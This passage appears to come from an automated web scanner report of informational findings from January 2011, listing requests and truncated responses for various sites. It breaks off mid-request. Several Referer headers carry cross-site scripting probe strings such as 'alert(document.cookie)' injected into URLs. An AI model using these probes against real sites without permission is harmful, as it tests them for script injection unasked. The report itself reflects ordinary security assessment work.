GET /media/video HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.0 502 Invalid response
Cache-Control: no-cache
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tw
...[SNIP]...

30.102. http://tweetmeme.com/popup/follow

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /popup/follow

Request

GET /popup/follow HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:59:31 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 6.7949295043945E-5
X-Served-In: 0.0015110969543457
X-Served-By: h02
Content-Length: 1370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <!-- title -->
       <ti
...[SNIP]...

30.103. http://tweetmeme.com/popup/tweet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /popup/tweet

Request

GET /popup/tweet HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:00:04 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 7.7009201049805E-5
X-Served-In: 0.71491718292236
X-Served-By: h03
Content-Length: 1405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <!-- title -->
       <ti
...[SNIP]...

30.104. http://tweetmeme.com/story/3832254868/htc-hd2-can-now-dual-boot-windows-phone-7-and-android-promises-to-love-them-equally-engadget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story/3832254868/htc-hd2-can-now-dual-boot-windows-phone-7-and-android-promises-to-love-them-equally-engadget

Request

GET /story/3832254868/htc-hd2-can-now-dual-boot-windows-phone-7-and-android-promises-to-love-them-equally-engadget HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.0 502 Invalid response
Cache-Control: no-cache
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tw
...[SNIP]...

30.105. http://tweetmeme.com/style/week

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /style/week

Request

GET /style/week HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.0 502 Invalid response
Cache-Control: no-cache
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tw
...[SNIP]...

30.106. http://uac.advertising.com/wrapper/aceUACping.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uac.advertising.com
Path:   /wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; F1=Bkl690kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJl2JpJh5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M9itzqEXE!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 21:32:57 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 24 Jan 2011 21:08:42 GMT
Connection: close
Content-Length: 2659

<html><head></head><body><script type='text/javascript'>    
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

30.107. http://venedet.michnica.net/download/donate.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://venedet.michnica.net
Path:   /download/donate.html

Request

GET /download/donate.html HTTP/1.1
Host: venedet.michnica.net
Proxy-Connection: keep-alive
Referer: http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu?57476%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e3231f45f59c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fa5a1b42d3949309610b52593e36fa6f=5bee479ce7f93991cea282d14030843c

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:09:35 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Wed, 12 Jan 2011 06:16:03 GMT
ETag: "992be9-1c8-499a022b5cec0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 456

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
<input type="hidden" name="hosted_button_id" value="36RNXGMCASXME">
<input typ
...[SNIP]...

30.108. http://whdhstore.hipcricket.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://whdhstore.hipcricket.com
Path:   /

Request

GET / HTTP/1.1
Host: whdhstore.hipcricket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 23:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"
Content-Length: 19423
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSTATBQ=FMADLDFCELMBEGBAHKIFEOLO; path=/
Cache-control: private


<style type="text/css">
/* classic styles pulled in from old template - using arial instead of TNR */
td {font-family:Arial; font-size:12px;color:#000000;}
p {font-family:Arial; font-size:12px;}
...[SNIP]...

30.109. http://wildspark.com/asher/ija/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wildspark.com
Path:   /asher/ija/

Request

GET /asher/ija/ HTTP/1.1
Host: wildspark.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:03:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tu=fc371e99f833e248ace3a9b91346cedd; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=wildspark.com; httponly
Vary: User-Agent,Accept-Encoding
Content-Length: 6
Content-Type: text/html
X-Cache: MISS from 337663
Connection: close

<b-ua>

30.110. http://www.armanijeans-theroom.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.armanijeans-theroom.com
Path:   /

Request

GET / HTTP/1.1
Host: www.armanijeans-theroom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:08:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
Vary: Accept-Encoding
Content-Length: 5926
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta property="og:title" content="ArmaniJeans-The Room" />
<meta property="og:description" content="Explore Arman
...[SNIP]...

30.111. http://www.aub.org/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aub.org
Path:   /x22

Request

GET /x22 HTTP/1.1
Host: www.aub.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:07 GMT
Content-Type: text/html
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:01:12 GMT
ETag: "169bb0d-4e4-486ced93a17fb"
Accept-Ranges: bytes
Content-Length: 1252
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>
   
   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

30.112. http://www.autocheck.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autocheck.com
Path:   /

Request

GET /?WT.mc_id=1824&siteID=1824 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:54:12 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.19751295913252218; path=/; expires=Wed, 23-Feb-11 23:54:12 GMT
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Cache-Control: private
Set-Cookie: referralCookie=dmCvyWYCQne4gqVC62; path=/; expires=Wed, 23-Feb-2011 23:54:11 GMT
Set-Cookie: JSESSIONID=dmCvyWYCQne4gqVC62; path=/
Connection: close
Content-Type: text/html
Content-Length: 29237


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1
...[SNIP]...

30.113. http://www.autotrader.com/inc/ad.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /inc/ad.html

Request

GET /inc/ad.html?Log=0&v=3.17.167500 HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:43 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 18:36:49 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=604800
Content-Type: text/html
Content-Length: 1999

<html>
<head>
<script src="http://ads.autotrader.com/DE/DartRichMedia_1_03.js" type="text/javascript"></script>
<script src="http://ads.autotrader.com/DE/flash8.js" type="text/javascript"></sc
...[SNIP]...

30.114. http://www.autotraderclassics.com/find/index.xhtml/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderclassics.com
Path:   /find/index.xhtml/x22

Request

GET /find/index.xhtml/x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:37:21 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Date: Mon, 24 Jan 2011 16:04:30 GMT
Content-Length: 19116
Connection: close
Set-Cookie: v1st=AD90949C1AABB6BF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
Set-Cookie: ATC_ID=216.66.31.240.1295885070163888; path=/; expires=Sat, 03-Jan-15 16:04:30 GMT; domain=.autotraderclassics.com
Set-Cookie: BIGipServerwww.autotraderclassics.com=3985170442.14360.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<script type='text/ja
...[SNIP]...

30.115. http://www.autotraderclassics.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderclassics.com
Path:   /x22

Request

GET /x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:37:21 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Date: Mon, 24 Jan 2011 16:04:29 GMT
Content-Length: 19116
Connection: close
Set-Cookie: v1st=38C713FCEE18F8B0; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
Set-Cookie: ATC_ID=216.66.31.238.1295885069167883; path=/; expires=Sat, 03-Jan-15 16:04:29 GMT; domain=.autotraderclassics.com
Set-Cookie: BIGipServerwww.autotraderclassics.com=4203274250.14360.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<script type='text/ja
...[SNIP]...

30.116. http://www.bymnews.com/news/newsList.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bymnews.com
Path:   /news/newsList.php

Request

GET /news/newsList.php HTTP/1.1
Host: www.bymnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:15:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Content-Length: 5025
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: Smarty error: unable to read resource: "" in <b>/home/bymnews/newsLib/smarty/Smarty.class.php</b> on line <b>1088</b><br />

<ul class="menu">
<li><a href="
...[SNIP]...

30.117. http://www.careersingear.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careersingear.com
Path:   /

Request

GET / HTTP/1.1
Host: www.careersingear.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:57:49 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.9 mod_python/3.2.8 Python/2.4.3
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=7d38163661ab3fa45bdf4f9462796ad7; path=/; domain=.careersingear.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 29481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

30.118. http://www.carsdirect.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carsdirect.com
Path:   /x22

Request

GET /x22 HTTP/1.1
Host: www.carsdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=6AFA93D77F160D2887EB6A8A80625603.eqapp5-2-worker; Path=/
Set-Cookie: TRACKER_ID=-1; Domain=.carsdirect.com; Expires=Sat, 23-Jul-2011 16:04:34 GMT; Path=/
Content-Language: en
Content-Length: 156
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Set-Cookie: BIGipServercarsdirect_pool=3253211308.0.0000; path=/

<link rel="stylesheet" href="http://cdc-img.ibsrv.net/includes/common.css" type="text/css"><html><head><script>document.location="/404error"</script></html>

30.119. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Request

GET /cgi/url.cgi HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:10 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 132

<html><head><title>Invalid URL</title></head>
<body><h1>Invalid URL</h1>
<p>Only http://*.freebsd.* is allowed.
</p>
</body></html>

30.120. http://www.google.com/instant/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /instant/

Request

GET /instant/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 07:45:29 GMT
Date: Mon, 24 Jan 2011 16:39:52 GMT
Expires: Mon, 24 Jan 2011 16:39:52 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>
Google Instant
</title>
<link href="instant.css" rel="stylesheet">
<meta content="Google Instant" nam
...[SNIP]...

30.121. http://www.google.com/intl/en/about.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /intl/en/about.html

Request

GET /intl/en/about.html HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 04:42:49 GMT
Date: Mon, 24 Jan 2011 16:39:56 GMT
Expires: Mon, 24 Jan 2011 16:39:56 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang="en">
<meta charset="utf-8">
<title>About Google</title>
<link href="http://www.google.com/css/gcs.css" rel="stylesheet">
<style>
h1 {
color:#636363;
float:left;
font
...[SNIP]...

30.122. http://www.google.com/intl/en/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /intl/en/ads/

Request

GET /intl/en/ads/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 18 Jan 2011 22:49:46 GMT
Date: Mon, 24 Jan 2011 16:39:55 GMT
Expires: Mon, 24 Jan 2011 16:39:55 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>
Welcome to Google Advertising Programs
</title>
<link href="//www.google.com/css/gcs-v2.css" rel="stylesh
...[SNIP]...

30.123. http://www.google.com/intl/en/options/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /intl/en/options/

Request

GET /intl/en/options/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 19:40:45 GMT
Date: Mon, 24 Jan 2011 16:39:53 GMT
Expires: Mon, 24 Jan 2011 16:39:53 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

...<!DOCTYPE html>
<html lang="en">
<meta charset="utf-8">
<base href="http://www.google.com">
<title>More Google Products</title>
<link rel="stylesheet" href="/options/default.css">

<div id="id">

<
...[SNIP]...

30.124. http://www.mit.edu/people/jik/software/xrn.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mit.edu
Path:   /people/jik/software/xrn.html

Request

GET /people/jik/software/xrn.html HTTP/1.1
Host: www.mit.edu
Accept: */*
Accept-Language: en
